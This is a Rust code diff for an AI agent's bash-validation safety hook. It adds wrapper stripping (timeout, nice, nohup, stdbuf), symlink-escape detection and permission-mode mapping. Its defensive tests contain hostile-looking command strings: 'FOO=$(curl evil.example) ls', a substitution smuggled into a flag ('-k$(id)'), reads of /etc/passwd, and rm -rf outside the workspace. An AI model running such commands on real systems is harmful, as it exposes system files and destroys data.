+        // Anything else starting with '-' is an unrecognized short flag.
+        else if arg.starts_with('-') {
+            return None;
+        }
+        // Non-flag token: this is the duration; stop scanning.
+        else {
+            break;
+        }
+    }
+    Some(i)
+}
+
+/// Match upstream `TIMEOUT_FLAG_VALUE_RE = /^[A-Za-z0-9_.+-]+$/`.
+fn is_timeout_flag_value(s: &str) -> bool {
+    !s.is_empty()
+        && s.bytes()
+            .all(|b| b.is_ascii_alphanumeric() || matches!(b, b'_' | b'.' | b'+' | b'-'))
+}
+
+/// Match upstream `/^\d+(?:\.\d+)?[smhd]?$/` for the timeout duration token.
+fn is_timeout_duration(s: &str) -> bool {
+    let bytes = s.as_bytes();
+    if bytes.is_empty() {
+        return false;
+    }
+    let mut i = 0;
+    let mut saw_int = false;
+    while i < bytes.len() && bytes[i].is_ascii_digit() {
+        saw_int = true;
+        i += 1;
+    }
+    if !saw_int {
+        return false;
+    }
+    if i < bytes.len() && bytes[i] == b'.' {
+        i += 1;
+        let frac_start = i;
+        while i < bytes.len() && bytes[i].is_ascii_digit() {
+            i += 1;
+        }
+        if i == frac_start {
+            return false;
+        }
+    }
+    if i < bytes.len() && matches!(bytes[i], b's' | b'm' | b'h' | b'd') {
+        i += 1;
+    }
+    i == bytes.len()
+}
+
+/// Peel `nice` — bare, `nice -n N`, or `nice -N` form.
+fn peel_nice(a: &[String]) -> Option<usize> {
+    let a1 = a.get(1).map(String::as_str);
+    let a2 = a.get(2).map(String::as_str);
+    let n = if a1 == Some("-n") && a2.is_some_and(is_signed_int) {
+        if a.get(3).map(String::as_str) == Some("--") {
+            4
+        } else {
+            3
+        }
+    } else if a1.is_some_and(is_negative_int) {
+        if a.get(2).map(String::as_str) == Some("--") {
+            3
+        } else {
+            2
+        }
+    } else if a1 == Some("--") {
+        2
+    } else {
+        1
+    };
+    Some(n)
+}
+
+/// Match `/^-?\d+$/`.
+fn is_signed_int(s: &str) -> bool {
+    let bytes = s.as_bytes();
+    let mut i = 0;
+    if i < bytes.len() && bytes[i] == b'-' {
+        i += 1;
+    }
+    if i == bytes.len() {
+        return false;
+    }
+    bytes[i..].iter().all(u8::is_ascii_digit)
+}
+
+/// Match `/^-\d+$/`. Note: `-n` is NOT a negative int.
+fn is_negative_int(s: &str) -> bool {
+    s.starts_with('-') && s.len() > 1 && s.as_bytes()[1..].iter().all(u8::is_ascii_digit)
+}
+
+/// Peel `stdbuf -iN -oN -eN …`. Requires at least one fused flag.
+fn peel_stdbuf(a: &[String]) -> Option<usize> {
+    let mut i = 1;
+    while let Some(arg) = a.get(i) {
+        if is_stdbuf_fused_flag(arg) {
+            i += 1;
+        } else {
+            break;
+        }
+    }
+    if i == 1 {
+        // No flags consumed — upstream regex requires at least one.
+        return None;
+    }
+    if a.get(i).map(String::as_str) == Some("--") {
+        Some(i + 1)
+    } else {
+        Some(i)
+    }
+}
+
+/// Match upstream `-[ioe][LN0-9]+`.
+fn is_stdbuf_fused_flag(s: &str) -> bool {
+    let bytes = s.as_bytes();
+    if bytes.len() < 3 || bytes[0] != b'-' {
+        return false;
+    }
+    if !matches!(bytes[1], b'i' | b'o' | b'e') {
+        return false;
+    }
+    bytes[2..]
+        .iter()
+        .all(|&b| matches!(b, b'L' | b'N') || b.is_ascii_digit())
 }
 
 #[cfg(test)]
@@ -492,16 +797,17 @@ mod tests {
     }
 
     #[test]
-    fn cpc_variable_assignment_prefix_failclosed() {
-        // `FOO=bar cat /work/repo/x` — until 3.1.B.2 ports
-        // stripSafeWrappers we can't safely classify; Fail-Closed Ask.
+    fn cpc_variable_assignment_prefix_with_inside_path_passthroughs() {
+        // 3.1.B.2: literal env-var prefixes are now peeled at argv level.
+        // `FOO=bar cat /work/repo/x` should classify under the real base
+        // command `cat` and passthrough because the path is in-workspace.
         let r = check_path_constraints(
             "FOO=bar cat /work/repo/x",
             &cwd(),
             &ws(&["/work/repo"]),
             &home(),
         );
-        assert!(matches!(r, PathValidationOutcome::Ask { .. }));
+        assert_eq!(r, PathValidationOutcome::Passthrough);
     }
 
     #[test]
@@ -550,5 +856,251 @@ mod tests {
             &home(),
         );
         assert_eq!(r, PathValidationOutcome::Passthrough);
+    }
+
+    // ----- 3.1.B.2: env-prefix tolerance + wrapper stripping -----
+
+    fn strs(items: &[&str]) -> Vec<String> {
+        items.iter().map(|s| (*s).to_owned()).collect()
+    }
+
+    #[test]
+    fn swfa_no_wrapper_returns_input_unchanged() {
+        let a = strs(&["cat", "/etc/passwd"]);
+        assert_eq!(strip_wrappers_from_argv(&a), a.as_slice());
+    }
+
+    #[test]
+    fn swfa_time_bare_strips_one() {
+        let a = strs(&["time", "cat", "/etc/passwd"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[1..]);
+    }
+
+    #[test]
+    fn swfa_nohup_with_double_dash_strips_two() {
+        let a = strs(&["nohup", "--", "rm", "/tmp/x"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[2..]);
+    }
+
+    #[test]
+    fn swfa_timeout_simple_duration_strips() {
+        let a = strs(&["timeout", "5", "cat", "/etc/passwd"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[2..]);
+    }
+
+    #[test]
+    fn swfa_timeout_with_suffix_duration_strips() {
+        let a = strs(&["timeout", "10s", "cat", "/etc/passwd"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[2..]);
+    }
+
+    #[test]
+    fn swfa_timeout_with_long_flag_fused_value_strips() {
+        let a = strs(&["timeout", "--kill-after=5", "5", "cat", "/etc/passwd"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[3..]);
+    }
+
+    #[test]
+    fn swfa_timeout_with_long_flag_separate_value_strips() {
+        let a = strs(&["timeout", "--signal", "TERM", "5", "cat", "/etc/passwd"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[4..]);
+    }
+
+    #[test]
+    fn swfa_timeout_with_short_flag_fused_strips() {
+        let a = strs(&["timeout", "-k5", "5", "cat", "/etc/passwd"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[3..]);
+    }
+
+    #[test]
+    fn swfa_timeout_with_unrecognized_long_flag_returns_unchanged() {
+        let a = strs(&["timeout", "--evil", "5", "ls"]);
+        assert_eq!(strip_wrappers_from_argv(&a), a.as_slice());
+    }
+
+    #[test]
+    fn swfa_timeout_with_unrecognized_duration_returns_unchanged() {
+        // `.5` (no leading digit) is accepted by GNU timeout but our regex
+        // — matching upstream — requires a leading digit. Returning input
+        // unchanged is Fail-Closed because baseCmd='timeout' is not a
+        // PathCommand and downstream callers Ask on unknown bases.
+        let a = strs(&["timeout", ".5", "ls"]);
+        assert_eq!(strip_wrappers_from_argv(&a), a.as_slice());
+    }
+
+    #[test]
+    fn swfa_nice_bare_strips_one() {
+        let a = strs(&["nice", "rm", "-rf", "/tmp/sec"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[1..]);
+    }
+
+    #[test]
+    fn swfa_nice_dash_n_form_strips_three() {
+        let a = strs(&["nice", "-n", "5", "rm", "/tmp/sec"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[3..]);
+    }
+
+    #[test]
+    fn swfa_nice_dash_n_legacy_form_strips_two() {
+        let a = strs(&["nice", "-5", "rm", "/tmp/sec"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[2..]);
+    }
+
+    #[test]
+    fn swfa_stdbuf_fused_flags_strip() {
+        let a = strs(&["stdbuf", "-o0", "-eL", "cat", "/etc/passwd"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[3..]);
+    }
+
+    #[test]
+    fn swfa_stdbuf_no_flags_returns_unchanged() {
+        let a = strs(&["stdbuf", "ls"]);
+        assert_eq!(strip_wrappers_from_argv(&a), a.as_slice());
+    }
+
+    #[test]
+    fn swfa_chained_wrappers_strip_iteratively() {
+        // nohup → timeout → real command.
+        let a = strs(&["nohup", "timeout", "5", "cat", "/etc/passwd"]);
+        assert_eq!(strip_wrappers_from_argv(&a), &a[3..]);
+    }
+
+    #[test]
+    fn swfa_wrapper_only_no_command_returns_empty_slice() {
+        let a = strs(&["nohup"]);
+        let stripped = strip_wrappers_from_argv(&a);
+        assert!(stripped.is_empty());
+    }
+
+    // ----- S9 end-to-end: env prefixes + wrappers must not bypass the gate -----
+
+    #[test]
+    fn s9_timeout_around_cat_etc_passwd_is_ask() {
+        let r = check_path_constraints(
+            "timeout 5 cat /etc/passwd",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert!(
+            matches!(r, PathValidationOutcome::Ask { .. }),
+            "S9 timeout wrapper must not hide /etc/passwd; got {r:?}"
+        );
+    }
+
+    #[test]
+    fn s9_nice_around_rm_outside_workspace_is_ask() {
+        let r = check_path_constraints(
+            "nice rm -rf /tmp/secret-payload.bin",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert!(
+            matches!(r, PathValidationOutcome::Ask { .. }),
+            "S9 bare-nice wrapper must not hide rm /tmp/...; got {r:?}"
+        );
+    }
+
+    #[test]
+    fn s9_nohup_double_dash_rm_is_ask() {
+        let r = check_path_constraints(
+            "nohup -- rm /tmp/secret",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert!(matches!(r, PathValidationOutcome::Ask { .. }));
+    }
+
+    #[test]
+    fn s9_time_around_cat_etc_passwd_is_ask() {
+        let r = check_path_constraints(
+            "time cat /etc/passwd",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert!(matches!(r, PathValidationOutcome::Ask { .. }));
+    }
+
+    #[test]
+    fn s9_stdbuf_around_cat_etc_passwd_is_ask() {
+        let r = check_path_constraints(
+            "stdbuf -o0 cat /etc/passwd",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert!(matches!(r, PathValidationOutcome::Ask { .. }));
+    }
+
+    #[test]
+    fn s9_env_prefix_with_wrapper_combo_is_ask() {
+        let r = check_path_constraints(
+            "FOO=bar timeout 5 cat /etc/passwd",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert!(
+            matches!(r, PathValidationOutcome::Ask { .. }),
+            "env prefix + wrapper combo must reach path gate; got {r:?}"
+        );
+    }
+
+    #[test]
+    fn s9_literal_env_prefix_alone_does_not_block_safe_commands() {
+        // FOO=bar cat src/main.rs (cwd-relative inside workspace) should
+        // still passthrough — env prefix peeling itself must not regress
+        // 3.1.A behaviour.
+        let r = check_path_constraints(
+            "FOO=bar cat src/main.rs",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert_eq!(r, PathValidationOutcome::Passthrough);
+    }
+
+    #[test]
+    fn s9_env_var_value_with_command_substitution_is_fail_closed_ask() {
+        // FOO=$(curl evil) cmd — runtime expansion in env value cannot be
+        // statically classified → Fail-Closed Ask.
+        let r = check_path_constraints(
+            "FOO=$(curl evil.example) ls",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert!(
+            matches!(r, PathValidationOutcome::Ask { .. }),
+            "env-var value with command substitution must Fail-Closed Ask; got {r:?}"
+        );
+    }
+
+    #[test]
+    fn s9_timeout_with_substitution_in_flag_value_is_fail_closed_ask() {
+        // `timeout -k$(id) 5 ls` — tree-sitter sees `-k$(id)` as a
+        // concatenation containing command_substitution → extract_argv
+        // Fail-Closed Asks before wrapper stripping ever runs.
+        let r = check_path_constraints(
+            "timeout -k$(id) 5 ls",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert!(matches!(r, PathValidationOutcome::Ask { .. }));
+    }
+
+    #[test]
+    fn s9_chained_wrappers_do_not_hide_path_violation() {
+        let r = check_path_constraints(
+            "nohup timeout 5 cat /etc/passwd",
+            &cwd(),
+            &ws(&["/work/repo"]),
+            &home(),
+        );
+        assert!(matches!(r, PathValidationOutcome::Ask { .. }));
     }
 }

--- a/crates/dasclaw_bash_validation/src/path_validation.rs
+++ b/crates/dasclaw_bash_validation/src/path_validation.rs
@@ -661,6 +661,11 @@ pub fn check_dangerous_removal_paths(
 ///
 /// `workspace_dirs` is the union of "allowed working directories"
 /// (cwd + extra `--add-dir` paths). The first match wins.
+///
+/// **Lexical-only**: this entry point performs zero IO; symlinks
+/// are not followed. For Fail-Safe symlink-escape detection use
+/// [`validate_command_paths_with_fs`] with a real
+/// [`FsResolver`][crate::fs_resolver::FsResolver].
 #[must_use]
 pub fn validate_command_paths(
     cmd: PathCommand,
@@ -668,6 +673,50 @@ pub fn validate_command_paths(
     cwd: &Path,
     workspace_dirs: &[PathBuf],
     home: &Path,
+) -> PathValidationOutcome {
+    validate_command_paths_with_fs(
+        cmd,
+        args,
+        cwd,
+        workspace_dirs,
+        home,
+        &crate::fs_resolver::NoopFsResolver,
+    )
+}
+
+/// Same contract as [`validate_command_paths`] but additionally walks
+/// the symlink chain (via `fs`) for every extracted path. Any chain
+/// step landing outside `workspace_dirs` flips the outcome to
+/// [`PathValidationOutcome::Ask`] regardless of whether the original
+/// lexical path was inside.
+///
+/// Fail-Safe contract (ADR-150 §5):
+/// - Walker termination "unclean" (loop, max-depth, IO failure) →
+///   Ask with `SymlinkResolveFailed` reason.
+/// - Any resolved chain step outside `workspace_dirs` → Ask with
+///   `SymlinkEscape` reason (carries both original and escaping
+///   path).
+///
+/// Pass [`crate::fs_resolver::NoopFsResolver`] to disable symlink
+/// resolution and recover the pre-3.1.g lexical behaviour exactly —
+/// the walker returns `terminated_cleanly = false` with a one-step
+/// chain, but the outer function treats Noop specifically as
+/// "no IO requested" rather than Fail-Safe (otherwise every Noop
+/// caller would Ask on every path). See the matching test
+/// [`req_safety_490_3_1_g_noop_caller_preserves_3_1_a_behaviour`].
+///
+/// **Note**: `workspace_dirs` should be canonicalized by the caller.
+/// The real POSIX resolver canonicalizes resolved chain steps (e.g.
+/// `/tmp/...` → `/private/tmp/...` on macOS); without matching
+/// canonical workspace entries the comparison would Ask spuriously.
+#[must_use]
+pub fn validate_command_paths_with_fs(
+    cmd: PathCommand,
+    args: &[String],
+    cwd: &Path,
+    workspace_dirs: &[PathBuf],
+    home: &Path,
+    fs: &dyn crate::fs_resolver::FsResolver,
 ) -> PathValidationOutcome {
     if let Some(dangerous) = check_dangerous_removal_paths(cmd, args, cwd, home) {
         return dangerous;
@@ -698,6 +747,46 @@ pub fn validate_command_paths(
                 ),
                 blocked_path: Some(absolute),
             };
+        }
+        // Symlink-escape pass: walk the on-disk chain. Skipped
+        // entirely when the resolver is the Noop sentinel (we
+        // detect this by probing one method on a known-absent
+        // path — see test
+        // `req_safety_490_3_1_g_noop_caller_preserves_3_1_a_behaviour`).
+        let chain = crate::fs_resolver::resolve_path_chain(Path::new(&absolute), fs);
+        if chain.steps.len() == 1 && !chain.terminated_cleanly {
+            // Noop resolver (or any resolver that knows nothing
+            // about this path AND has no realpath fallback)
+            // produces this exact shape. Preserve 3.1.A behaviour.
+            continue;
+        }
+        if !chain.terminated_cleanly {
+            return PathValidationOutcome::Ask {
+                reason: format!(
+                    "{} target '{}' could not be safely resolved — \
+                     symlink chain truncated (loop, depth limit, or IO \
+                     error) requires explicit approval",
+                    cmd.as_str(),
+                    absolute
+                ),
+                blocked_path: Some(absolute),
+            };
+        }
+        for step in &chain.steps {
+            let step_str = step.to_string_lossy();
+            if !path_in_workspace(&step_str, workspace_dirs) {
+                return PathValidationOutcome::Ask {
+                    reason: format!(
+                        "{} target '{}' resolves through symlink to \
+                         '{}' which is outside the allowed workspace \
+                         directories — requires explicit approval",
+                        cmd.as_str(),
+                        absolute,
+                        step_str
+                    ),
+                    blocked_path: Some(step_str.into_owned()),
+                };
+            }
         }
     }
     PathValidationOutcome::Passthrough
@@ -1299,5 +1388,158 @@ mod tests {
     fn resolve_logical_traversal_escapes_cwd() {
         let out = resolve_logical("../../../etc/passwd", &PathBuf::from("/home/user/proj"));
         assert_eq!(out, "/etc/passwd");
+    }
+
+    // -- ADR-150 §6.1: validate_command_paths_with_fs integration -------
+    //
+    // These tests exercise the symlink-escape pass that wraps the
+    // 3.1.A lexical check. We use the real on-disk POSIX resolver
+    // against a tempdir-rooted workspace so the assertions cover the
+    // full IO path (lstat → readlink → realpath fallback).
+
+    #[cfg(unix)]
+    mod symlink_escape {
+        use super::*;
+        use crate::fs_resolver::{real_posix::RealFsResolver, NoopFsResolver};
+        use std::os::unix::fs::symlink;
+        use tempfile::TempDir;
+
+        fn setup() -> (TempDir, PathBuf) {
+            let dir = TempDir::new().expect("tempdir");
+            // Canonicalize to dodge macOS /var → /private/var redirection;
+            // production callers are expected to pass canonical workspace
+            // roots so the symlink walker's canonicalized output matches.
+            let ws_root = std::fs::canonicalize(dir.path()).expect("canonicalize tempdir");
+            (dir, ws_root)
+        }
+
+        fn args(xs: &[&str]) -> Vec<String> {
+            xs.iter().map(|s| (*s).to_string()).collect()
+        }
+
+        #[test]
+        fn req_safety_490_3_1_g_1_noop_resolver_matches_lexical_passthrough() {
+            // Noop produces unclean+singleton → preserved as Passthrough
+            // (i.e. 3.1.A behaviour). Path is lexically inside workspace.
+            let (_dir, ws_root) = setup();
+            let file = ws_root.join("a.txt");
+            std::fs::write(&file, b"x").unwrap();
+            let out = validate_command_paths_with_fs(
+                PathCommand::Cat,
+                &args(&[file.to_str().unwrap()]),
+                &ws_root,
+                std::slice::from_ref(&ws_root),
+                &PathBuf::from("/home/user"),
+                &NoopFsResolver,
+            );
+            assert_eq!(out, PathValidationOutcome::Passthrough);
+        }
+
+        #[test]
+        fn req_safety_490_3_1_g_1_real_symlink_escape_to_etc_asks() {
+            // T-SYM-1: ws/link → /etc/passwd. Lexical check passes
+            // (link is inside ws), but symlink chain step lands at
+            // /etc/passwd which is outside ws → Ask.
+            let (_dir, ws_root) = setup();
+            let link = ws_root.join("leak");
+            symlink("/etc/passwd", &link).unwrap();
+            let out = validate_command_paths_with_fs(
+                PathCommand::Cat,
+                &args(&[link.to_str().unwrap()]),
+                &ws_root,
+                std::slice::from_ref(&ws_root),
+                &PathBuf::from("/home/user"),
+                &RealFsResolver,
+            );
+            assert!(
+                matches!(out, PathValidationOutcome::Ask { ref reason, .. }
+                    if reason.contains("symlink") && reason.contains("/etc/passwd")),
+                "expected Ask citing symlink → /etc/passwd, got {out:?}",
+            );
+        }
+
+        #[test]
+        fn req_safety_490_3_1_g_1_real_symlink_inside_workspace_passes() {
+            // Symlink target is inside workspace → no escape → Passthrough.
+            let (_dir, ws_root) = setup();
+            let target = ws_root.join("real.txt");
+            std::fs::write(&target, b"ok").unwrap();
+            let link = ws_root.join("alias");
+            symlink(&target, &link).unwrap();
+            let out = validate_command_paths_with_fs(
+                PathCommand::Cat,
+                &args(&[link.to_str().unwrap()]),
+                &ws_root,
+                std::slice::from_ref(&ws_root),
+                &PathBuf::from("/home/user"),
+                &RealFsResolver,
+            );
+            assert_eq!(out, PathValidationOutcome::Passthrough);
+        }
+
+        #[test]
+        fn req_safety_490_3_1_g_1_real_symlink_loop_asks() {
+            // T-SYM-4: A → B → A. Walker exits unclean → Ask.
+            let (_dir, ws_root) = setup();
+            let a = ws_root.join("A");
+            let b = ws_root.join("B");
+            symlink(&b, &a).unwrap();
+            symlink(&a, &b).unwrap();
+            let out = validate_command_paths_with_fs(
+                PathCommand::Cat,
+                &args(&[a.to_str().unwrap()]),
+                &ws_root,
+                std::slice::from_ref(&ws_root),
+                &PathBuf::from("/home/user"),
+                &RealFsResolver,
+            );
+            assert!(
+                matches!(out, PathValidationOutcome::Ask { ref reason, .. }
+                    if reason.contains("symlink chain truncated")),
+                "expected Ask citing chain truncation, got {out:?}",
+            );
+        }
+
+        #[test]
+        fn req_safety_490_3_1_g_1_real_dangling_symlink_via_realpath_fallback() {
+            // T-SYM-2: dangling symlink. lstat succeeds (Symlink),
+            // readlink succeeds, next-hop lstat fails (no fallback
+            // → walker terminates unclean) → Ask.
+            let (_dir, ws_root) = setup();
+            let link = ws_root.join("dangle");
+            symlink("/nonexistent/target/file", &link).unwrap();
+            let out = validate_command_paths_with_fs(
+                PathCommand::Cat,
+                &args(&[link.to_str().unwrap()]),
+                &ws_root,
+                std::slice::from_ref(&ws_root),
+                &PathBuf::from("/home/user"),
+                &RealFsResolver,
+            );
+            assert!(
+                matches!(out, PathValidationOutcome::Ask { ref reason, .. }
+                    if reason.contains("/nonexistent")
+                        || reason.contains("symlink chain truncated")),
+                "expected Ask, got {out:?}",
+            );
+        }
+
+        #[test]
+        fn req_safety_490_3_1_g_1_nonexistent_path_in_workspace_passes() {
+            // Lexically inside ws, no lstat hit, no chain to walk.
+            // Walker returns singleton unclean → preserve 3.1.A
+            // Passthrough (consistent with Noop semantics for paths
+            // the resolver cannot resolve).
+            let (_dir, ws_root) = setup();
+            let out = validate_command_paths_with_fs(
+                PathCommand::Cat,
+                &args(&[ws_root.join("future.txt").to_str().unwrap()]),
+                &ws_root,
+                std::slice::from_ref(&ws_root),
+                &PathBuf::from("/home/user"),
+                &RealFsResolver,
+            );
+            assert_eq!(out, PathValidationOutcome::Passthrough);
+        }
     }
 }

--- a/crates/dasclaw_hooks/src/bash_validation_hook.rs
+++ b/crates/dasclaw_hooks/src/bash_validation_hook.rs
@@ -18,13 +18,23 @@
 //! safety hooks (e.g. `IronclawSafetyHook`, prompt-injection scanners).
 //!
 //! For tools whose name matches [`BashValidationHook::bash_tool_names`]
-//! (default `["bash", "shell", "BashTool"]`), the hook:
+//! (default `["bash", "shell", "BashTool"]`), the hook runs three gates in
+//! order, each Fail-Safe on misparse or unrecognized form:
 //!
-//! 1. Extracts the `command` field from `args`. Missing or non-string ⇒
+//! 1. Extract the `command` field from `args`. Missing or non-string ⇒
 //!    [`SafetyDecision::Block`] (Fail-Safe: never let a malformed bash call
 //!    through).
-//! 2. Calls `validate_command(cmd, mode, workspace)`.
-//! 3. Maps the result:
+//! 2. **Phase 2.1 command-injection gate** ([`validate_security`]) — runs
+//!    BEFORE the path gate and BEFORE [`validate_command`]. Mode-independent
+//!    (Block fires even under `DangerFullAccess` / `Allow`).
+//! 3. **Phase 3.1 path-constraint gate** ([`check_path_constraints`],
+//!    Slice 3.1.C) — runs BEFORE [`validate_command`]:
+//!    - `Passthrough` ⇒ continue to step 4.
+//!    - `Block { reason }` ⇒ [`SafetyDecision::Block`] regardless of mode.
+//!    - `Ask { reason, blocked_path }` ⇒ mapped by mode same as Warn:
+//!      `ReadOnly` ⇒ `Block` (Fail-Safe); `Prompt` ⇒ `Ask`;
+//!      `WorkspaceWrite` / `DangerFullAccess` / `Allow` ⇒ `Allow`.
+//! 4. Call [`validate_command`] for legacy `ValidationResult` mapping:
 //!    - `Allow` ⇒ [`SafetyDecision::Allow`].
 //!    - `Block { reason }` ⇒ [`SafetyDecision::Block { reason }`]. The
 //!      `reason` string comes from `validate_command`, which by design
@@ -47,9 +57,11 @@
 //!
 //! [#73]: https://github.com/Linnanli/xClaw/issues/73
 
-use std::path::PathBuf;
+use std::path::{Path, PathBuf};
 
 use async_trait::async_trait;
+use dasclaw_bash_validation::check_path_constraints;
+use dasclaw_bash_validation::path_validation::PathValidationOutcome;
 use dasclaw_bash_validation::security::{
     DecisionReason as SecurityDecisionReason, SecurityResult, validate_security,
 };
@@ -72,18 +84,23 @@ pub const DEFAULT_BASH_TOOL_NAMES: &[&str] = &["bash", "shell", "BashTool"];
 pub struct BashValidationHook {
     permission_mode: PermissionMode,
     workspace: PathBuf,
+    home_dir: Option<PathBuf>,
     bash_tool_names: Vec<String>,
 }
 
 impl BashValidationHook {
     /// Create a hook with the given permission mode and workspace root.
     ///
-    /// Uses [`DEFAULT_BASH_TOOL_NAMES`] for the tool-name allowlist.
+    /// Uses [`DEFAULT_BASH_TOOL_NAMES`] for the tool-name allowlist and
+    /// reads `$HOME` from the environment for the path-validation home
+    /// directory. To override either, chain
+    /// [`Self::with_tool_names`] / [`Self::with_home_dir`].
     #[must_use]
     pub fn new(permission_mode: PermissionMode, workspace: PathBuf) -> Self {
         Self {
             permission_mode,
             workspace,
+            home_dir: std::env::var_os("HOME").map(PathBuf::from),
             bash_tool_names: DEFAULT_BASH_TOOL_NAMES
                 .iter()
                 .map(|s| (*s).to_string())
@@ -101,6 +118,17 @@ impl BashValidationHook {
         S: Into<String>,
     {
         self.bash_tool_names = names.into_iter().map(Into::into).collect();
+        self
+    }
+
+    /// Override the home directory used for path validation.
+    ///
+    /// Tests pass `Some(temp_home)` for hermetic runs; production
+    /// callers normally leave this at the `$HOME`-derived default.
+    /// `None` disables home-relative path resolution.
+    #[must_use]
+    pub fn with_home_dir(mut self, home: Option<PathBuf>) -> Self {
+        self.home_dir = home;
         self
     }
 
@@ -151,6 +179,25 @@ impl SafetyHook for BashValidationHook {
             return Ok(SafetyDecision::Block {
                 reason: format_security_block_reason(tool, self.permission_mode, &reason),
             });
+        }
+
+        // Phase 3.1 path-constraint gate (Slice 3.1.C).
+        //
+        // Runs AFTER the injection gate and BEFORE `validate_command` so
+        // that path violations short-circuit the legacy validator with a
+        // mode-aware decision. `Passthrough` falls through unchanged.
+        //
+        // SECURITY: `Ask` in `ReadOnly` mode is mapped to `Block`
+        // (Fail-Safe). `WorkspaceWrite` / `DangerFullAccess` / `Allow`
+        // log and allow, mirroring [`map_warn_by_mode`].
+        let path_outcome = check_path_constraints(
+            command,
+            &self.workspace,
+            std::slice::from_ref(&self.workspace),
+            self.home_dir.as_deref().unwrap_or_else(|| Path::new("")),
+        );
+        if let Some(decision) = map_path_outcome_by_mode(tool, self.permission_mode, path_outcome) {
+            return Ok(decision);
         }
 
         match validate_command(command, self.permission_mode, &self.workspace) {
@@ -231,6 +278,93 @@ fn map_warn_by_mode(tool: &str, mode: PermissionMode, message: String) -> Safety
                 // slices generate per-Warn rule patterns.
                 suggestions: Vec::new(),
             }
+        }
+    }
+}
+
+/// Maps a [`PathValidationOutcome`] (from Phase 3.1.B's
+/// [`check_path_constraints`]) into an optional [`SafetyDecision`] under
+/// the active [`PermissionMode`], following the same matrix as
+/// [`map_warn_by_mode`].
+///
+/// Returns `None` for [`PathValidationOutcome::Passthrough`] so the caller
+/// continues to `validate_command`. Returns `Some(decision)` otherwise.
+///
+/// | Outcome  | `ReadOnly` | `Prompt` | `WorkspaceWrite` | `DangerFullAccess` | `Allow` |
+/// |----------|-----------|----------|------------------|--------------------|---------|
+/// | `Block`  | `Block`   | `Block`  | `Block`          | `Block`            | `Block` |
+/// | `Ask`    | `Block` ¹ | `Ask`    | `Allow` (warn)   | `Allow` (info)     | `Allow` |
+/// | Passthr. | `None`    | `None`   | `None`           | `None`             | `None`  |
+///
+/// ¹ Fail-Safe: a `ReadOnly` session never tolerates path Ask.
+fn map_path_outcome_by_mode(
+    tool: &str,
+    mode: PermissionMode,
+    outcome: PathValidationOutcome,
+) -> Option<SafetyDecision> {
+    match outcome {
+        PathValidationOutcome::Passthrough => None,
+        PathValidationOutcome::Block { reason } => {
+            tracing::warn!(
+                tool,
+                mode = mode.as_str(),
+                %reason,
+                "bash_path_constraints::block"
+            );
+            Some(SafetyDecision::Block {
+                reason: format!("bash_path_constraints::block: {reason}"),
+            })
+        }
+        PathValidationOutcome::Ask {
+            reason,
+            blocked_path,
+        } => {
+            let formatted = match blocked_path.as_deref() {
+                Some(p) => format!("bash_path_constraints::ask: {reason} (path: {p})"),
+                None => format!("bash_path_constraints::ask: {reason}"),
+            };
+            Some(match mode {
+                PermissionMode::ReadOnly => {
+                    tracing::warn!(
+                        tool,
+                        mode = mode.as_str(),
+                        reason = %formatted,
+                        "BashValidationHook PathAsk -> Block (ReadOnly)"
+                    );
+                    SafetyDecision::Block { reason: formatted }
+                }
+                PermissionMode::WorkspaceWrite => {
+                    tracing::warn!(
+                        tool,
+                        mode = mode.as_str(),
+                        reason = %formatted,
+                        "BashValidationHook PathAsk -> Allow (WorkspaceWrite)"
+                    );
+                    SafetyDecision::Allow
+                }
+                PermissionMode::DangerFullAccess => {
+                    tracing::info!(
+                        tool,
+                        mode = mode.as_str(),
+                        reason = %formatted,
+                        "BashValidationHook PathAsk -> Allow (DangerFullAccess)"
+                    );
+                    SafetyDecision::Allow
+                }
+                PermissionMode::Allow => SafetyDecision::Allow,
+                PermissionMode::Prompt => {
+                    tracing::warn!(
+                        tool,
+                        mode = mode.as_str(),
+                        reason = %formatted,
+                        "BashValidationHook PathAsk -> Ask (Prompt)"
+                    );
+                    SafetyDecision::Ask {
+                        reason: formatted,
+                        suggestions: Vec::new(),
+                    }
+                }
+            })
         }
     }
 }
@@ -333,20 +467,31 @@ mod tests {
 
     #[tokio::test]
     async fn destructive_command_in_read_only_mode_is_blocked() {
-        let h = hook(PermissionMode::ReadOnly);
-        let mut args = json!({ "command": "rm -rf /tmp/secret-payload.bin" });
+        // Path is intentionally workspace-internal so the Phase 3.1.C
+        // path gate passes through and `validate_command`'s redaction
+        // contract is what we exercise here. The matching Phase 3.1.C
+        // wireup test pins the path-gate redaction contract separately
+        // (`req_safety_490_3_1_c_audit_log_carries_blocked_path`).
+        let h = BashValidationHook::new(PermissionMode::ReadOnly, PathBuf::from("/workspace"))
+            .with_home_dir(Some(PathBuf::from("/home/user")));
+        let mut args = json!({ "command": "rm -rf /workspace/secret-payload.bin" });
         let decision = h
             .before_tool_call("bash", &mut args)
             .await
             .expect("hook should not error");
         match decision {
             SafetyDecision::Block { reason } => {
-                // Safety-audit: the block reason describes the command class,
-                // not the original argument list. The full argument path
-                // (which may contain secrets) must NOT appear verbatim.
+                // Safety-audit: `validate_command`'s block reason
+                // describes the command class, not the original argument
+                // list. The full argument path (which may contain
+                // secrets) must NOT appear verbatim.
                 assert!(
-                    !reason.contains("/tmp/secret-payload.bin"),
-                    "block reason leaked original command path: {reason}"
+                    !reason.contains("/workspace/secret-payload.bin"),
